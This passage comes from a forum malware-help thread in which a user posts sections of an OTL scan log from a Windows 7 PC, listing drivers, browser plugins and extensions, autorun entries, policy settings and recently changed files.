DRV:64bit: - [2009/11/24 14:29:16 | 000,074,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 19:10:47 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rootmdm.sys -- (ROOTMODEM)
DRV:64bit: - [2009/07/13 19:09:10 | 000,007,680 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\loop.sys -- (msloop)
DRV:64bit: - [2009/06/17 08:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)
DRV:64bit: - [2009/06/17 08:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/25 10:48:00 | 000,153,128 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdm.sys -- (s1018mdm)
DRV:64bit: - [2009/03/25 10:48:00 | 000,146,472 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018unic.sys -- (s1018unic)
DRV:64bit: - [2009/03/25 10:48:00 | 000,133,160 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mgmt.sys -- (s1018mgmt)
DRV:64bit: - [2009/03/25 10:48:00 | 000,128,552 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018obex.sys -- (s1018obex)
DRV:64bit: - [2009/03/25 10:48:00 | 000,113,704 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018bus.sys -- (s1018bus)
DRV:64bit: - [2009/03/25 10:48:00 | 000,034,856 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018nd5.sys -- (s1018nd5)
DRV:64bit: - [2009/03/25 10:48:00 | 000,019,496 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdfl.sys -- (s1018mdfl)
DRV:64bit: - [2008/11/16 17:39:44 | 000,157,968 | ---- | M] (Deterministic Networks, Inc.) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\dne64x.sys -- (DNE)
DRV:64bit: - [2008/08/04 23:21:48 | 001,075,712 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WPN111vx.sys -- (WPN111)
DRV:64bit: - [2006/11/28 20:46:20 | 000,043,328 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PCAMp50a64.sys -- (PCAMp50a64)
DRV:64bit: - [2006/11/28 20:46:20 | 000,041,280 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\PCASp50a64.sys -- (PCASp50a64)
DRV - [2014/05/19 05:46:34 | 000,013,480 | ---- | M] () [Kernel | On_Demand | Running] -- E:\Program Files (x86)\MSI Afterburner\RTCore64.sys -- (RTCore64)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{B2BDB263-17DB-4090-80D7-8B05E67E35D7}: "URL" = https://www.google.com/search?q={searchTerms}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456}: "URL" = https://search.yahoo.com/yhs/search?hspart=w3i&hsimp=yhs-synd1&p={searchTerms}&type=W3i_DS,221,0_0,Search,20140727,0,0,0,7743
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

tomfullerton · « **Reply #9 on:** January 23, 2015, 09:21:44 PM »

------------------***************Continuing from the other post ************-----------------

========== FireFox ==========

FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@spoon.net/Spoon Plugin 3.33: C:\Program Files (x86)\Spoon\3.33.8.485\npMozillaSpoonPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@wolfram.com/Mathematica: C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\ubisoft.com/uplaypc: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll File not found

[2014/02/09 23:37:26 | 000,215,040 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll
[2011/12/09 12:23:32 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll

========== Chrome ==========

CHR - default_search_provider: (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - plugin: Shockwave Flash (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
CHR - plugin: Conduit Chrome Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll
CHR - plugin: Conduit Radio Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll
CHR - plugin: 2007 Microsoft Office system (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL
CHR - plugin: Winamp Application Detector (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npwachk.dll
CHR - plugin: Wolfram Mathematica (Enabled) = C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.10516.0\npctrl.dll
CHR - plugin: Java(TM) Platform SE 7 U5 (Enabled) = C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
CHR - plugin: Windows Activation Technologies (Enabled) = C:\Windows\system32\Wat\npWatWeb.dll
CHR - plugin: iTunes Application Detector (Enabled) = E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajjloplcjllkammemhenacfjcccockde\1.2.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcdabfmndggphffkchfdcekcokmbnkjl\1.7_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\blelaljgakacjdeaggpjilljobdmboff\2.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.10_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.5.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog\1.4.2.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljmpblpndedodbmceeghpahabeppemed\0.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nejdjlaibiicicciokonbbkecjleilon\1.6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih\2.0.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg\7.2.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolicfpkpnpbaonkibdjkpbchakfdmig\0.93_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pemhgklkefakciniebenbfclihhmmfcd\3.3.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgeolalilifpodheeocdmbhehgnkkbak\0.2.94_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2015/01/20 23:10:57 | 000,000,822 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Adblock Plus for IE Browser Helper Object) - {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
O2 - BHO: (Microsoft Web Test Recorder 12.0 Helper) - {432dd630-7e03-4c97-9d62-b99f52df4fc2} - E:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Kernel and Hardware Abstraction Layer] C:\Windows\KHALMNPR.Exe (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [JMB36X IDE Setup] C:\Windows\RaidTool\xInsIDE.exe ()
O4 - HKLM..\Run: [Logitech G35] C:\Program Files (x86)\Logitech\G35\G35.exe (Logitech(c))
O4 - HKU\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\Run: [F.lux] C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe (Flux Software LLC)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\RunOnce: [Adobe Speed Launcher] 1422035204 File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8:64bit: - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([asa1] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([cad] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([webvpn] https in Trusted sites)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O16 - DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 1.7.0_51)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F450D213-6B32-4A98-B391-92E436671A03}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell - "" = AutoRun
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell\AutoRun\command - "" = F:\Startme.exe
O33 - MountPoints2\F\Shell - "" = AutoRun
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\setup.exe
O33 - MountPoints2\G\Shell - "" = AutoRun
O33 - MountPoints2\G\Shell\AutoRun\command - "" = G:\bunnyust.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

tomfullerton · « **Reply #10 on:** January 23, 2015, 09:22:17 PM »

----------------************** Continuing from the other post ************-------------------

========== Files/Folders - Created Within 30 Days ==========

[2015/01/23 12:35:19 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/01/22 20:49:27 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/01/22 20:00:38 | 000,000,000 | ---D | C] -- C:\FRST
[2015/01/22 00:05:16 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.jmc
[2015/01/21 23:50:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2015/01/21 23:49:49 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Desktop\mbar
[2015/01/21 22:33:14 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2015/01/21 21:53:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Spybot - Search & Destroy
[2015/01/15 15:06:11 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Documents\FIFA 15
[2015/01/13 16:45:28 | 005,553,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2015/01/13 16:45:27 | 003,971,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2015/01/13 16:45:27 | 003,916,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2015/01/13 16:45:27 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2015/01/13 16:45:27 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe
[2015/01/13 16:45:27 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll
[2015/01/13 16:45:26 | 000,156,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ncsi.dll
[2015/01/13 16:45:26 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\TSWbPrxy.exe
[2014/12/26 22:56:58 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.gradle
[2014/12/26 00:22:00 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.AndroidStudio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.android
[2014/12/25 23:58:57 | 000,084,992 | ---- | C] (Intel Corporation) -- C:\Windows\SysNative\drivers\IntelHaxm.sys
[2014/09/16 23:06:27 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe1289.dll
[2014/09/16 22:57:10 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe92DE.dll
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:52:03 | 000,880,194 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2015/01/23 12:52:03 | 000,731,498 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
